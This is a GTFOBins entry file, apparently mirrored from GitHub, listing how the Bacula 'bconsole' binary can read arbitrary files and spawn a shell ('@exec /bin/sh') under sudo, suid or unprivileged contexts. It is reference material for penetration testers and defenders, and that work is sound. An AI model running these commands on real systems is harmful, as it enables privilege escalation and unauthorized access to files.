1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 06:31:33 +01:00
GTFOBins.github.io/_gtfobins/bconsole
2025-12-24 20:37:04 +01:00

20 lines
352 B
Plaintext

---
functions:
file-read:
- code: |-
bconsole -c /path/to/file-input
comment: |-
The file is actually parsed and the first wrong line is returned in an error message.
contexts:
sudo:
suid:
unprivileged:
shell:
- code: |-
bconsole
@exec /bin/sh
contexts:
sudo:
unprivileged:
...